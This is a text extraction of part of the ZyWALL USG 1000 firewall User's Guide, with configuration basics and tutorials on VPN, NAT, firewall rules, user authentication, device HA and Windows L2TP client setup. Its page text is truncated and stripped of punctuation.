Page 102: ...quence of menu items and tabs you should click to find the main screen s for this feature See the web help or the related User s Guide chapter for information about each screen PREREQUISITES These are other features you should configure before you configure the main screen s for this feature If you did not configure one of the prerequisites first you can often select an option to create a new obje...

Page 103: ...routing behavior in order to send packets through the appropriate interface or VPN tunnel You can also use policy routes for bandwidth management out of the ZyWALL port triggering and general NAT on the source address You have to set up the criteria next hops and NAT settings first MENU ITEM S Configuration Licensing Update PREREQUISITES Registration for anti virus and IDP application patrol Inter...

Page 104: ...have multiple WAN connections 9 Select the interface that you are using for your WAN connection ge2 and ge3 are the default WAN interfaces If you have multiple WAN connections select the trunk 10 Specify the amount of bandwidth FTP traffic can use You may also want to set a low priority for FTP traffic Note The ZyWALL checks the policy routes in the order that they are listed So make sure that you...

Page 105: ...en the Add icon 6 5 9 DDNS Dynamic DNS maps a domain name to a dynamic IP address The ZyWALL helps maintain this mapping 6 5 10 NAT Use Network Address Translation NAT to make computers on a private network behind the ZyWALL available outside the private network The ZyWALL only checks regular through ZyWALL firewall rules for packets that are redirected by NAT it does not check the to ZyWALL firew...

Page 106: ... proxy server This can speed up web browsing because the proxy server keeps copies of the web pages that have been accessed so they are readily available the next time one of your users needs to access that page The ZyWALL does not check to ZyWALL firewall rules for packets that are redirected by HTTP redirect It does check regular through ZyWALL firewall rules Example Suppose you want HTTP reques...

Page 107: ...ss groups and services or service groups Each of these objects must be configured in a different screen To ZyWALL firewall rules control access to the ZyWALL Configure to ZyWALL firewall rules for remote management By default the firewall only allows management connections from the LAN WAN zone Example Suppose you have a SIP proxy server connected to the DMZ zone for VoIP calls You could configure...

Page 108: ...mmunication between two sites over the Internet or any insecure network that uses TCP IP for communication The ZyWALL also offers hub and spoke VPN Example See Chapter 7 on page 117 6 5 16 SSL VPN Use SSL VPN to give remote users secure network access Example See Chapter 7 on page 117 MENU ITEM S Configuration VPN IPSec VPN you can also use the Quick Setup VPN Setup wizard PREREQUISITES Interfaces...

Page 109: ...configuration screen Click the BitTorrent application patrol entry s Edit icon Set the default policy s access to Drop Add another policy Select the user account that you created for Bob You can leave the source destination and log settings at the default Note With this example Bob would have to log in using his account If you do not want him to have to log in you might create an exception policy ...

Page 110: ...s and web features such as cookies You can define which user accounts or groups can access what content and at what times You must have a subscription in order to use the category based content filtering You can subscribe using the menu item or one of the wizards Example You can configure a policy that blocks Bill s access to arts and entertainment web pages during the workday You must have alread...

Page 111: ... not available 7 Select the Arts Entertainment category you need to click Advanced to display it and click OK 8 Click General to go to the content filter general configuration screen 9 Enable the content filter 10 Add a policy that uses the schedule the filtering profile and the user that you created 6 5 23 Anti Spam Use anti spam to detect and take action on spam mail 6 5 24 Device HA To increase...

Page 112: ... groups address VPN connections local remote network NAT policy routes criteria next hop HOST NAT authentication policies firewall application patrol source destination content filter NAT HOST user settings force user authentication address groups remote management System address group Policy routes criteria firewall application patrol source destination content filter user settings force user aut...

Page 113: ...management connection through an external serial modem connected to the AUX port Example Suppose you want to allow an administrator to use HTTPS to manage the ZyWALL from the WAN 1 Create an administrator account Configuration Object User Group guest Access network services ext user The same as a user or a guest except the ZyWALL looks for the specific type in an external authentication server If ...

Page 114: ...n manage Configuration files Use configuration files to back up and restore the complete configuration of the ZyWALL You can store multiple configuration files in the ZyWALL and switch between them without restarting Shell scripts Use shell scripts to run a series of CLI commands These are useful for large repetitive configuration changes for example creating a lot of VPN tunnels and for troublesh...

Page 115: ...yWALL USG 1000 User s Guide 115 Always use Maintenance Shutdown Shutdown or the shutdown command before you turn off the ZyWALL or remove the power Not doing so can cause the firmware to become corrupt MENU ITEM S Maintenance Shutdown ...

Page 116: ...Chapter 6 Configuration Basics ZyWALL USG 1000 User s Guide 116 ...

Page 117: ...iptions of individual screens see Technical Reference on page 207 7 1 How to Configure Interfaces Port Grouping and Zones This tutorial shows how to configure Ethernet interfaces port grouping and zones for the following example configuration see Section 6 2 2 on page 96 for the default configuration Interface ge2 uses a static IP address of 1 2 3 4 and is in the WAN zone DMZ servers are connected...

Page 118: ...7 1 1 Configure a WAN Ethernet Interface You need to assign the ZyWALL s ge2 interface a static IP address of 1 2 3 4 Click Configuration Network Interface Ethernet and double click the ge2 interface s entry Select Use Fixed IP Address and configure the IP address subnet mask and default gateway settings and click OK Figure 61 Configuration Network Interface Ethernet Edit ge2 7 1 2 Configure Zones...

Page 119: ...t to the Member box and click OK Figure 62 Configuration Network Zone WAN Edit 7 1 3 Configure Port Grouping Here is how to combine physical ports P4 and P5 into the ge4 interface port group 1 Click Configuration Network Interface Port Grouping 2 Drag physical port 5 onto representative interface ge4 and click Apply Figure 63 Configuration Network Interface Port Grouping Example ...

Page 120: ...figure a Cellular Interface Use 3G cards for cellular WAN Internet connections Table 264 on page 909 lists the compatible 3G devices In this example you install or connect the 3G card before you configure the cellular interfaces but is also possible to reverse the sequence 1 Make sure the 3G device s SIM card is installed 2 Install the 3G device in the ZyWALL s PCIMCIA slot or connect it to one of...

Page 121: ...llular 3G service provider 0000 in this example Figure 66 Configuration Network Interface Cellular Edit 5 Go to the Dashboard The Interface Status Summary section should contain a cellular entry When its connection status is Connected you can use the 3G connection to access the Internet Figure 67 Status 6 The ZyWALL automatically adds the cellular interface to the system default WAN trunk If the Z...

Page 122: ... for an example 7 3 How to Configure Load Balancing This example shows how to configure a trunk for two WAN connections to the Internet The available bandwidth for the connections is 1Mbps ge2 and 512 Kbps ge3 respectively As these connections have different bandwidth use the Weighted Round Robin algorithm to send traffic to wan1 and wan2 in a 2 1 ratio Figure 68 Trunk Example You do not have to c...

Page 123: ...k the ge2 entry Enter the available bandwidth 1000 kbps in the Egress Bandwidth field Click OK Figure 69 Configuration Network Interface Ethernet Edit ge2 2 Repeat the process to set the egress bandwidth for ge3 to 512 Kbps 7 3 2 Configure the WAN Trunk 1 Click Configuration Network Interface Trunk Click the Add icon ...

Page 124: ...r s Guide 124 2 Name the trunk and set the Load Balancing Algorithm field to Weighted Round Robin Add ge2 and enter 2 in the Weight column Add ge3 and enter 1 in the Weight column Click OK Figure 70 Configuration Network Interface Trunk Add ...

Page 125: ...Configuration Network Interface Trunk 7 4 How to Set Up an IPSec VPN Tunnel This example shows how to use the IPSec VPN configuration screens to create the following VPN tunnel see Section 5 4 on page 82 for details on the VPN quick setup wizard Figure 72 VPN Example 192 168 1 0 24 172 16 1 0 24 1 2 3 4 2 2 2 2 LAN LAN ...

Page 126: ... do not have to set up any other objects before you configure the VPN gateway because this VPN tunnel does not use any certificates or extended authentication 1 Click Configuration VPN IPSec VPN VPN Gateway and then click the Add icon 2 Enable the VPN gateway and name it VPN_GW_EXAMPLE For My Address select Interface and ge2 For the Peer Gateway Address select Static Address and enter 2 2 2 2 in t...

Page 127: ...emote network before you can set up the VPN connection 1 Click Configuration Object Address Click the Add icon 2 Give the new address object a name VPN_REMOTE_SUBNET change the Address Type to SUBNET Set up the Network field to 172 16 1 0 and the Netmask to 255 255 255 0 Click OK Figure 74 Configuration Object Address Add 3 Click Configuration VPN IPSec VPN VPN Connection Click the Add icon ...

Page 128: ... the VPN either try to connect to a device on the peer IPSec router s LAN or click Configuration VPN IPSec VPN VPN Connection and use the VPN connection screen s Connect icon 7 4 3 Configure Security Policies for the VPN Tunnel You configure security policies based on zones Assign the new VPN connection to a zone to be able to apply security policies firewall rules IDP and so on to the VPN connect...

Page 129: ...ers HQ and branch office B have USG ZyWALLs or ZyWALL 1050s Branch office A s ZyWALL uses one VPN rule to access both the headquarters HQ network and branch office B s network Branch office B s ZyWALL uses one VPN rule to access both the headquarters and branch office A s networks Figure 76 Hub and spoke VPN Example This hub and spoke VPN example uses the following settings Branch Office A ZyNOS b...

Page 130: ...10 0 0 1 VPN Connection Local Policy 192 168 169 0 255 255 255 0 Remote Policy 192 168 167 0 192 168 168 255 Disable Policy Enforcement 7 5 0 1 Hub and spoke VPN Requirements and Suggestions Consider the following when implementing a hub and spoke VPN This example uses a wide range for the ZyNOS based ZyWALL s remote network to use a narrower range see Section 25 4 1 on page 467 for an example of ...

Page 131: ... overlaps with its local network settings set ipsec swSkipOverlapIp to on to send traffic destined to A s local network to A s local network instead of through the VPN tunnel 7 6 How to Configure User aware Access Control You can configure many policies and security settings for specific users or groups of users This is illustrated in the following example where you will set up the following polic...

Page 132: ... Web Configurator 1 Click Configuration Object User Group User Click the Add icon 2 Enter the same user name that is used in the RADIUS server and set the User Type to ext user because this user account is authenticated by an external server Click OK Figure 77 Configuration Object User Group User Add 3 Repeat this process to set up the remaining user accounts 7 6 2 Set Up User Groups Set up the us...

Page 133: ...ourse you could add more members later Figure 78 Configuration Object User Group Group Add 3 Repeat this process to set up the remaining user groups 7 6 3 Set Up User Authentication Using the RADIUS Server This step sets up user authentication using the RADIUS server First configure the settings for the RADIUS server Then set up the authentication method and configure the ZyWALL to use the authent...

Page 134: ...default entry Click the Add icon Select group radius because the ZyWALL should use the specified RADIUS server for authentication Click OK Figure 80 Configuration Object Auth method Add 3 Click Configuration Auth Policy In the Authentication Policy Summary section click the Add icon 4 Set up a default policy that forces every user to log in to the ZyWALL before the ZyWALL routes traffic for them S...

Page 135: ...ers try to browse the web or use any HTTP HTTPS application the Login screen appears They have to log in using the user name and password in the RADIUS server 7 6 4 Web Surfing Policies With Bandwidth Restrictions Use application patrol AppPatrol to enforce the web surfing and MSN policies You must have already subscribed for the application patrol service You can subscribe using the Configuration...

Page 136: ...lick Configuration AppPatrol If application patrol and bandwidth management are not enabled enable them and click Apply Figure 82 Configuration AppPatrol General 2 Click the Common tab and double click the http entry Figure 83 Configuration AppPatrol Common ...

Page 137: ...3 Double click the Default policy Figure 84 Configuration AppPatrol Common http 4 Change the access to Drop because you do not want anyone except authorized user groups to browse the web Click OK Figure 85 Configuration AppPatrol Common http Edit Default ...

Page 138: ...in the Inbound and Outbound fields Click OK Repeat this process to add exceptions for all the other user groups that are allowed to browse the web Figure 86 Configuration AppPatrol Common http Edit Default 7 6 5 Set Up MSN Policies Set up a recurring schedule object first because Sales can only use MSN during specified times on specified days 1 Click Configuration Object Schedule Click the Add ico...

Page 139: ...w the steps in Section 7 6 4 on page 135 to set up the appropriate policies for MSN in application patrol Make sure to specify the schedule when you configure the policy for the Sales group s MSN access 7 6 6 Set Up Firewall Rules Use the firewall to control access from LAN to the DMZ 1 Click Configuration Firewall Add Set the From field as LAN and the To field as DMZ Set the Access field to deny ...

Page 140: ...that are allowed to access the DMZ 7 7 How to Use a RADIUS Server to Authenticate User Accounts based on Groups The previous example showed how to have a RADIUS server authenticate individual user accounts If the RADIUS server has different user groups distinguished by the value of a specific attribute you can configure the make a couple of slight changes in the configuration to have the RADIUS se...

Page 141: ...tication port and key set the Group Membership Attribute field to the attribute that the ZyWALL is to check to determine to which group a user belongs This example uses Class This attribute s value is called a group identifier it determines to which group a user belongs In this example the values are Finance Engineer Sales and Boss Figure 90 Configuration Object AAA Server RADIUS Add ...

Page 142: ...up User Add 3 Repeat this process to set up the remaining groups of user accounts 7 8 How to Use Endpoint Security and Authentication Policies Here is how to use endpoint security to make sure that users computers meet specific security requirements before they are allowed to access the network This example requires users to have Kaspersky Internet security or anti virus software on their computer...

Page 143: ...ntries to the allowed list you can double click an entry to move it Select Endpoint must have Anti Virus software installed and move the Kaspersky Internet Security and Kaspersky Anti Virus anti virus software entries to the allowed list The following figure shows the configuration screen example Figure 92 Configuration Object Endpoint Security Add ...

Page 144: ... an authentication policy to use endpoint security objects Enable the policy and name it Set the Source Address to LAN and the Destination Address to any the Schedule set to none and Authentication set to required to apply this policy to all users Select Force User Authentication to redirect the HTTP traffic of users who are not yet logged in to the ZyWALL s login screen Enable EPS checking and mo...

Page 145: ...age example when a user s computer does not meet an endpoint security object s requirements Click Close to return to the login screen Figure 95 Example Endpoint Security Error Message 7 9 How to Configure Service Control Service control lets you configure rules that control HTTP and HTTPS management access to the Web Configurator and separate rules that control HTTP and HTTPS ...

Page 146: ...ou configure service control to allow management or user HTTP or HTTPS access make sure the firewall is not configured to block that access 7 9 1 Allow HTTPS Administrator Access Only From the LAN This example configures service control to block administrator HTTPS access from all zones except the LAN 1 Click Configuration System WWW 2 In HTTPS Admin Service Control click the Add icon Figure 96 Co...

Page 147: ...7 4 Select the new rule and click the Add icon Figure 98 Configuration System WWW First Example Admin Service Rule Configured 5 In the Zone field select ALL and set the Action to Deny Click OK Figure 99 Configuration System WWW Service Control Rule Edit ...

Page 148: ...he LAN zone Non admin users can still use HTTPS to log into the ZyWALL from any of the ZyWALL s zones to use SSL VPN for example 7 10 How to Allow Incoming H 323 Peer to peer Calls Suppose you have a H 323 device on the LAN for VoIP calls and you want it to be able to receive peer to peer calls from the WAN Here is an example of how to configure NAT and the firewall to have the ZyWALL forward H 32...

Page 149: ...Calls Example 7 10 1 Turn On the ALG Click Configuration Network ALG Select Enable H 323 ALG and Enable H 323 transformations and click Apply Figure 102 Configuration Network ALG 7 10 2 Set Up a NAT Policy For H 323 In this example you need a NAT policy to forward H 323 TCP port 1720 traffic received on the ZyWALL s 10 0 0 8 WAN IP address to LAN IP address 192 168 1 56 10 0 0 8 192 168 1 56 ...

Page 150: ...nfiguration Object Address Add to create an address object for the public WAN IP address called WAN_IP for H323 here Then use it again to create an address object for the H 323 device s private LAN IP address called LAN_H323 here Figure 103 Create Address Objects ...

Page 151: ... Original IP to the WAN address object WAN_IP for H323 Set the Mapped IP to the H 323 device s LAN IP address object LAN_H323 Set the Port Mapping Type to Port the Protocol Type to TCP and the original and mapped ports to 1720 Click OK Figure 104 Configuration Network NAT Add 7 10 3 Set Up a Firewall Rule For H 323 The default firewall rule for WAN to LAN traffic drops all traffic Here is how to c...

Page 152: ...ALL applies NAT to traffic before applying the firewall rule Set the Service to H 323 Click OK Figure 105 Configuration Firewall Add 7 11 How to Allow Public Access to a Web Server This is an example of making an HTTP web server in the DMZ zone accessible from the Internet the WAN zone In this example you have public IP address 1 1 1 1 that you will use on the ge3 interface and map to the HTTP ser...

Page 153: ... 1 1 1 Figure 108 Creating the Address Object for the Public IP Address 7 11 2 Configure NAT You need a NAT rule to send HTTP traffic coming to IP address 1 1 1 1 on ge3 to the HTTP server s private IP address of 192 168 3 7 In the Configuration Network NAT screen click the Add icon and create a new NAT entry as follows Set the Incoming Interface to ge3 Set the Original IP to the Public_HTTP_Serve...

Page 154: ...tails Figure 109 Creating the NAT Entry 7 11 3 Set Up a Firewall Rule The firewall blocks traffic from the WAN zone to the DMZ zone by default so you need to create a firewall rule to allow the public to send HTTP traffic to IP address 1 1 1 1 in order to access the HTTP server If a domain name is registered for IP address 1 1 1 1 users can just go to the domain name to access the web server ...

Page 155: ... DMZ_HTTP DMZ_HTTP is the destination because the ZyWALL applies NAT to traffic before applying the firewall rule Set the Access field to allow and the Service to HTTP and click OK Figure 110 Configuration Firewall Add 7 12 How to Use an IPPBX on the DMZ This is an example of making an IPPBX x6004 using SIP in the DMZ zone accessible from the Internet the WAN zone In this example you have public I...

Page 156: ...yWALL USG 1000 User s Guide 156 address 1 1 1 2 that you will use on the ge3 interface and map to the IPPBX s private IP address of 192 168 3 7 The local SIP clients are on the LAN Figure 111 IPPBX Example Network Topology ...

Page 157: ... Transformations and click Apply Figure 112 Configuration Network ALG 7 12 2 Create the Address Objects Use Configuration Object Address Add to create the address objects 1 Create a host address object named IPPBX DMZ for the IPPBX s private DMZ IP address of 192 168 3 9 Figure 113 Creating the Address Object for the IPPBX s Private IP Address ...

Page 158: ...N and also be able to send calls to the WAN so you set the Classification to NAT 1 1 Set the Incoming Interface to ge2 Set the Original IP to the WAN address object IPPBX Public If a domain name is registered for IP address 1 1 1 2 users can use it to connect to for making SIP calls Set the Mapped IP to the IPPBX s DMZ IP address object IPPBX DMZ Set the Port Mapping Type to Port the Protocol Type...

Page 159: ...Set Up a WAN to DMZ Firewall Rule for SIP The firewall blocks traffic from the WAN zone to the DMZ zone by default so you need to create a firewall rule to allow the public to send SIP traffic to the IPPBX If a domain name is registered for IP address 1 1 1 2 users can use it to connect to for making SIP calls ...

Page 160: ..._DMZ is the destination because the ZyWALL applies NAT to traffic before applying the firewall rule Set the Access field to allow and click OK Figure 116 Configuration Firewall Add 7 12 5 Set Up a DMZ to LAN Firewall Rule for SIP The firewall blocks traffic from the DMZ zone to the LAN zone by default so you need to create a firewall rule to allow the IPPBX to send SIP traffic to the SIP clients o...

Page 161: ...Multiple Static Public WAN IP Addresses for LAN to WAN Traffic If your ISP gave you a range of static public IP addresses here is how to configure a policy route to have the ZyWALL use them for traffic it sends out from the LAN 7 13 1 Create the Public IP Address Range Object Click Configuration Object Address Add to create the address object that represents the range of static public IP addresses...

Page 162: ...tional it is recommended This example uses LAN to WAN Range Specifying a Source Address is also optional although recommended This example uses LAN_SUBNET Set the Source Network Address Translation to Public IPs and click OK Figure 119 Configuring the Policy Route 7 14 How to Use Active Passive Device HA Here is an example of using device HA High Availability to backup ZyWALL A the master with ZyW...

Page 163: ... Takes Over Each ZyWALL s ge1 interface also has a separate management IP address that stays the same whether the ZyWALL functions as the master or a backup ZyWALL A s management IP address is 192 168 1 3 and ZyWALL B s is 192 168 1 5 Figure 121 Device HA Management IP Addresses 7 14 1 Before You Start ZyWALL A should already be configured You will use device HA to copy ZyWALL A s settings to B la...

Page 164: ... 255 0 as the Manage IP Subnet Mask Click OK Figure 122 Configuration Device HA Active Passive Mode Edit Master ZyWALL Example 3 Set the Device Role to Master This example focuses on the connection from the LAN ge1 to the Internet through the ge2 interface so select the ge1 and ge2 interfaces and click Activate Enter a Synchronization Password mySyncPassword in this example and click Apply Figure ...

Page 165: ...igurator Connect ZyWALL B to the Internet and subscribe it to the same subscription services like content filtering and anti virus to which ZyWALL A is subscribed See Chapter 11 on page 265 for more on the subscription services 2 In ZyWALL B click Configuration Device HA Active Passive Mode Click ge1 s Edit icon 3 Configure 192 168 1 5 as the Management IP and 255 255 255 0 as the Subnet Mask Clic...

Page 166: ...erval to 60 Click Apply Figure 126 Configuration Device HA Active Passive Mode Backup ZyWALL Example 5 Click the General tab Turn on device HA and click Apply Figure 127 Configuration Device HA General Master ZyWALL Example 7 14 4 Deploy the Backup ZyWALL Connect ZyWALL B s ge1 interface to the LAN network Connect ZyWALL B s ge2 interface to the same router that ZyWALL A s ge2 interface uses for I...

Page 167: ...een to save copies of the ZyWALLs configuration files that you can compare 2 To test your device HA configuration disconnect ZyWALL A s ge1 or ge2 interface Computers on LAN should still be able to access the Internet If they cannot check your connections and device HA configuration Congratulations Now that you have configured device HA for LAN you can use the same process for any of the ZyWALL s ...

Page 168: ...Chapter 7 Tutorials ZyWALL USG 1000 User s Guide 168 ...

Page 169: ...nnects through the Internet You configure an IP address pool object named L2TP_POOL to assign the remote users IP addresses from 192 168 10 10 to 192 168 10 20 for use in the L2TP VPN tunnel The VPN rule allows the remote user to access the LAN_SUBNET which covers the 192 168 1 x subnet 8 2 Configuring the Default L2TP VPN Gateway Example 1 Click Configuration VPN Network IPSec VPN VPN Gateway to ...

Page 170: ...bnet as the specified My Address click Configure Network Routing Policy Route Show Advanced Settings and select Use Policy Route to Override Direct Route Select Pre Shared Key and configure a password This example uses top secret Click OK Figure 129 Configuration VPN IPSec VPN VPN Gateway Edit 2 Select the Default_L2TP_VPN_GW entry and click Activate and click Apply to turn on the entry Figure 130...

Page 171: ... Advanced Settings button Configure and enforce the local and remote policies Create an address object that uses host type and contains the My Address IP address that you configured in the Default_L2TP_VPN_GW The address object in this example uses the ge2 interface s IP address 172 16 1 2 and is named L2TP_IFACE Set the Application Scenario to Remote Access Server Role Set the Local Policy to use...

Page 172: ...ick Configuration VPN L2TP VPN and configure the following Configure an IP address pool for the range of 192 168 10 10 to 192 168 10 20 It is called L2TP_POOL here Enable the connection Set the VPN Connection to the Default_L2TP_VPN_Connection Set the IP Address Pool to L2TP_POOL This example uses the default authentication method the ZyWALL s local user data base Select a user or group of users t...

Page 173: ... sections go along with the L2TP VPN configuration example in Section 8 1 on page 169 Before you configure the client issue one of the following commands from the Windows command prompt to make sure the computer is running the Microsoft IPSec service Make sure you include the quotes For Windows XP use net start ipsec services For Windows 2000 use net start ipsec policy agent 8 5 1 Configuring L2TP...

Page 174: ...G 1000 User s Guide 174 2 Select Connect to a workplace and click Next Figure 134 Set up a connection or network Chose a connection type 3 Select Use my Internet connection VPN Figure 135 Connect to a workplace How do you want to connect ...

Page 175: ...VPN 172 16 1 2 in this example For the Destination Name enter L2TP to ZyWALL Select Don t connect now just set it up so I can connect later and click Next Figure 136 Connect to a workplace Type the Internet address to connect to 5 Enter the user name and password of a user account that can use the L2TP VPN connection and click Next Figure 137 Connect to a workplace Type your user name and password...

Page 176: ... Guide 176 6 Click Close Figure 138 Connect to a workplace The connection is ready to use 7 In the Network and Sharing Center screen click Connect to a network Right click the L2TP VPN connection and select Properties Figure 139 Connect L2TP to ZyWALL ...

Page 177: ...ncryption to Optional encryption connect even if no encryption and the Allow these protocols radio button Select Unencrypted password PAP and clear all of the other check boxes Click OK Figure 141 Connect ZyWALL L2TP Security Advanced 10 Click Yes When you use L2TP VPN to connect to the ZyWALL the ZyWALL establishes an encrypted IPSec VPN tunnel first and then builds an L2TP tunnel ...

Page 178: ...Set the Type of VPN to L2TP IPSec VPN and click IPSec Settings Figure 143 L2TP to ZyWALL Properties Networking 12 Select Use preshared key for authentication and enter the pre shared key of the VPN gateway configuration that the ZyWALL is using for L2TP VPN top secret in this example Click OK to close the IPSec Settings window and then click OK again to close the Properties window Figure 144 L2TP ...

Page 179: ...SG 1000 User s Guide 179 13 Select the L2TP VPN connection and click Connect Figure 145 L2TP to ZyWALL Properties Networking 14 Enter the user name and password of your ZyWALL user account Click Connect Figure 146 Connect L2TP to ZyWALL ...

Page 180: ...sword are verified and notifies you when the connection is established Figure 147 Connecting to L2TP to ZyWALL 16 If a window appears asking you to select a location for the network you can select Work if you want your computer to be discoverable by computers behind the ZyWALL Figure 148 Set Network Location ...

Page 181: ...r the network location has been set click Close Figure 149 Set Network Location Successful 18 After the connection is up a connection icon displays in your system tray Click it and then the L2TP connection to open a status screen Figure 150 Connection System Tray Icon ...

Page 182: ...a status screen Figure 151 Network and Sharing Center 20 Click Details to see the address that you received is from the L2TP range you specified on the ZyWALL 192 168 10 10 192 168 10 20 Figure 152 ZyWALL L2TP Status Details 21 Access a server or other network resource behind the ZyWALL to make sure your access works ...

Page 183: ...VPN connection 1 Click Start Control Panel Network Connections New Connection Wizard 2 Click Next in the Welcome screen 3 Select Connect to the network at my workplace and click Next Figure 153 New Connection Wizard Network Connection Type 4 Select Virtual Private Network connection and click Next Figure 154 New Connection Wizard Network Connection ...

Page 184: ...yWALL USG 1000 User s Guide 184 5 Type L2TP to ZyWALL as the Company Name Figure 155 New Connection Wizard Connection Name 6 Select Do not dial the initial connection and click Next Figure 156 New Connection Wizard Public Network ...

Page 185: ...figured as the My Address in the VPN gateway configuration that the ZyWALL is using for L2TP VPN 172 16 1 2 in this example Figure 157 New Connection Wizard VPN Server Selection 8 Click Finish 9 The Connect L2TP to ZyWALL screen appears Click Properties Security Figure 158 Connect L2TP to ZyWALL 172 16 1 2 ...

Page 186: ...settings and click Settings Figure 159 Connect L2TP to ZyWALL Security 11 Select Optional encryption connect even if no encryption and the Allow these protocols radio button Select Unencrypted password PAP and clear all of the other check boxes Click OK Figure 160 Connect ZyWALL L2TP Security Advanced ...

Page 187: ...s Figure 161 L2TP to ZyWALL Properties Security 13 Select the Use pre shared key for authentication check box and enter the pre shared key used in the VPN gateway configuration that the ZyWALL is using for L2TP VPN Click OK Figure 162 L2TP to ZyWALL Properties Security IPSec Settings ...

Page 188: ... L2TP to ZyWALL Properties Networking 15 Enter the user name and password of your ZyWALL account Click Connect Figure 164 Connect L2TP to ZyWALL 16 A window appears while the user name and password are verified 17 A ZyWALL L2TP icon displays in your system tray Double click it to open a status screen Figure 165 ZyWALL L2TP System Tray Icon ...

Page 189: ...000 Windows 2000 does not support using pre shared keys by default Use the following procedures to edit the registry and then configure the computer to use the L2TP client 8 5 3 1 Editing the Windows 2000 Registry In Windows 2000 you need to create a registry entry and restart the computer to have it use pre shared keys 1 Click Start Run Type regedit and click OK Figure 167 Starting the Registry E...

Page 190: ...trolSet Services Rasman P arameters Figure 168 Registry Key 4 Right click Parameters and select New DWORD Value Figure 169 New DWORD Value 5 Enter ProhibitIpSec as the name And make sure the Data displays as 0 s Figure 170 ProhibitIpSec DWORD Value 6 Restart the computer and continue with the next section ...

Page 191: ...2000 IPSec Policy After you have created the registry entry and restarted the computer use these directions to configure an IPSec policy for the computer to use 1 Click Start Run Type mmc and click OK Figure 171 Run mmc 2 Click Console Add Remove Snap in Figure 172 Console Add Remove Snap in ...

Page 192: ...Add IP Security Policy Management Add Finish Click Close OK Figure 173 Add IP Security Policy Management Finish 4 Right click IP Security Policies on Local Machine and click Create IP Security Policy Click Next in the welcome screen Figure 174 Create IP Security Policy ...

Page 193: ...ser s Guide 193 5 Name the IP security policy L2TP to ZyWALL and click Next Figure 175 IP Security Policy Name 6 Clear the Activate the default response rule check box and click Next Figure 176 IP Security Policy Request for Secure Communication ...

Page 194: ... User s Guide 194 7 Leave the Edit Properties check box selected and click Finish Figure 177 IP Security Policy Completing the IP Security Policy Wizard 8 In the properties dialog box click Add Next Figure 178 IP Security Policy Properties Add ...

Page 195: ...000 User s Guide 195 9 Select This rule does not specify a tunnel and click Next Figure 179 IP Security Policy Properties Tunnel Endpoint 10 Select All network connections and click Next Figure 180 IP Security Policy Properties Network Type ...

Page 196: ...uide 196 11 Select Use this string to protect the key exchange preshared key type password in the text box and click Next Figure 181 IP Security Policy Properties Authentication Method 12 Click Add Figure 182 IP Security Policy Properties IP Filter List ...

Page 197: ...in the Addressing tab Select My IP Address in the Source address drop down list box Select A specific IP Address in the Destination address drop down list box and type the ZyWALL s WAN IP address 172 16 1 2 in this example in the IP Address field Make certain the Mirrored Also match packets with the exact opposite source and destination addresses check box is selected and click Apply Figure 184 Fi...

Page 198: ...llowing in the Filter Properties window s Protocol tab Set the protocol type to UDP from port 1701 Select To any port Click Apply OK and then Close Figure 185 Filter Properties Protocol 16 Select ZyWALL WAN_IP and click Next Figure 186 IP Security Policy Properties IP Filter List ...

Page 199: ...d Close Figure 187 IP Security Policy Properties IP Filter List 18 In the Console window right click L2TP to ZyWALL and select Assign Figure 188 Console L2TP to ZyWALL Assign 8 5 3 3 Configure the Windows 2000 Network Connection After you have configured the IPSec policy use these directions to create a network connection ...

Page 200: ...e 189 Start New Connection Wizard 2 Select Connect to a private network through the Internet and click Next Figure 190 New Connection Wizard Network Connection Type 3 Enter the domain name or WAN IP address configured as the My Address in the VPN gateway configuration that the ZyWALL is using for L2TP VPN Click Next Figure 191 New Connection Wizard Destination Address 172 16 1 2 ...

Page 201: ...01 4 Select For all users and click Next Figure 192 New Connection Wizard Connection Availability 5 Name the connection L2TP to ZyWALL and click Finish Figure 193 New Connection Wizard Naming the Connection 6 Click Properties Figure 194 Connect L2TP to ZyWALL ...

Page 202: ... Settings Figure 195 Connect L2TP to ZyWALL Security 8 Select Optional encryption allowed connect even if no encryption and the Allow these protocols radio button Select Unencrypted password PAP and clear all of the other check boxes Click OK Click Yes if a screen pops up Figure 196 Connect L2TP to ZyWALL Security Advanced ...

Page 203: ...ck OK Figure 197 Connect L2TP to ZyWALL Networking 10 Enter your user name and password and click Connect It may take up to one minute to establish the connection and register on the network Figure 198 Connect L2TP to ZyWALL 11 A ZyWALL L2TP icon displays in your system tray Double click it to open a status screen Figure 199 ZyWALL L2TP System Tray Icon ...

Page 204: ...tails and scroll down to see the address that you received is from the L2TP range you specified on the ZyWALL 192 168 10 10 192 168 10 20 Figure 200 L2TP to ZyWALL Status Details 13 Access a server or other network resource behind the ZyWALL to make sure your access works ...

Page 205: ...Chapter 8 L2TP VPN Example ZyWALL USG 1000 User s Guide 205 ...

Page 206: ...Chapter 8 L2TP VPN Example ZyWALL USG 1000 User s Guide 206 ...

Page 207: ...207 PART II Technical Reference ...

Page 208: ...208 ...

Page 209: ...rmation Use the VPN status screen see Section 9 2 1 on page 216 to look at the VPN tunnels that are currently established Use the DHCP Table screen see Section 9 2 5 on page 219 to look at the IP addresses currently assigned to DHCP clients and the IP addresses reserved for specific MAC addresses Use the Current Users screen see Section 9 2 6 on page 220 to look at a list of the users currently lo...

Page 210: ...reshing the information displayed in the widget Refresh Now D Click this to update the widget s information immediately Close this Module E Click this to close the widget Use Widget Setting to re open it Virtual Device Rear Panel Click this to view details about the ZyWALL s rear panel Hover your cursor over a connected interface or slot to display status details Front Panel Click this to view det...

Page 211: ...rface in the virtual router Active This interface is the master interface in the virtual router Stand By This interface is a backup interface in the virtual router Fault This VRRP group is not functioning in the virtual router right now For example this might happen if the interface is down n a Device HA is not active on the interface Zone This field displays the zone to which the interface is cur...

Page 212: ...over this field to display the Show Memory Usage icon that takes you to a chart of the ZyWALL s recent memory usage Flash Usage This field displays what percentage of the ZyWALL s onboard flash memory is currently being used USB Storage Usage This field displays what percentage of the USB storage device s capacity is currently being used Active Sessions This field displays how many traffic session...

Page 213: ...rface is not connected For PPP interfaces Connected The PPP interface is connected Disconnected The PPP interface is not connected If the PPP interface is disabled it does not appear in the list HA Status This field displays the status of the interface in the virtual router Active This interface is the master interface in the virtual router Stand By This interface is a backup interface in the virt...

Page 214: ...ice connected to the ZyWALL is ready for the ZyWALL to use Unused The ZyWALL is unable to mount a USB storage device connected to the ZyWALL System Status System Uptime This field displays how long the ZyWALL has been running since it last restarted or was turned on Current Date Time This field displays the current date and time in the ZyWALL The format is yyyy mm dd hh mm ss VPN Status Click this...

